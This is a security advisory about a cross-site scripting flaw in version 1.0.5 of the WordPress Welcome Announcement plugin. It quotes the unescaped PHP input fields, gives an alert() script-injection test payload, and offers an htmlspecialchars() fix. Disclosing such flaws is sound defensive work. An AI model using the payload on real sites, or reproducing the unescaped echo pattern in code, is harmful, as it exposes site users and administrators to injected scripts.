WordPress Welcome Announcement 1.0.5 Cross Site Scripting

2016.08.07
Credit: bl4ck_mohajem
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##################### # Exploit Title: Wordpress Welcome Announcement Cross Site Scripting # Exploit Author: bl4ck_mohajem # Vendor Homepage: https://wordpress.org/plugins/welcome-announcement/ # Tested On: Windows7 # Software Link: https://downloads.wordpress.org/plugin/welcome-announcement.1.0.5.zip # Version: 1.0.5 ###################### # Vulnerable File and Codes: wa_options.php Lines(134-142-161-188-196-204-215-223-234-258-266) <input class="entry" type="text" size=40 name="wa_opts[cookie_name]" value="<?php echo $wa_opts["cookie_name"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[cookie_expiration]'value="<?php echo $wa_opts["cookie_expiration"]; ?>" /> <input class="entry" type="text" size=76 name='wa_opts[animation_name]' value="<?php echo $wa_opts["animation_name"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[animation_width]' value="<?php echo $wa_opts["animation_width"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[animation_height]' value="<?php echo $wa_opts["animation_height"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[animation_bgcolor]' id="color_animation" onclick="showColorGrid2('color_animation','none');" value="<?php echo $wa_opts["animation_bgcolor"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[veil_bgcolor]' id="color_veil" onclick="showColorGrid2('color_veil','none');" value="<?php echo $wa_opts["veil_bgcolor"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[veil_transparency]' value="<?php echo $wa_opts["veil_transparency"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[fade_in_duration]' value="<?php echo $wa_opts["fade_in_duration"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[animation_duration]' value="<?php echo $wa_opts["animation_duration"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[fade_out_duration]' value="<?php echo $wa_opts["fade_out_duration"]; ?>" /> ###################### # Exploit : For test Cross site scripting can use this code in all of the above inputs are vulnerable. "><script>alert(/xss/)</script>< Address: http://localhost/pentest/wordpress/wp-admin/themes.php?page=wa_options ###################### # Patch : To fix this vulnerability you use htmlspecialchars() function . <input class="entry" type="text" size=40 name="wa_opts[cookie_name]" value="<?php echo htmlspecialchars($wa_opts["cookie_name"]); ?>" /> And other lines, too. ###################### # tnx: Milad Hacking - n1arash - bl4ck_li0n -malah_sky ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top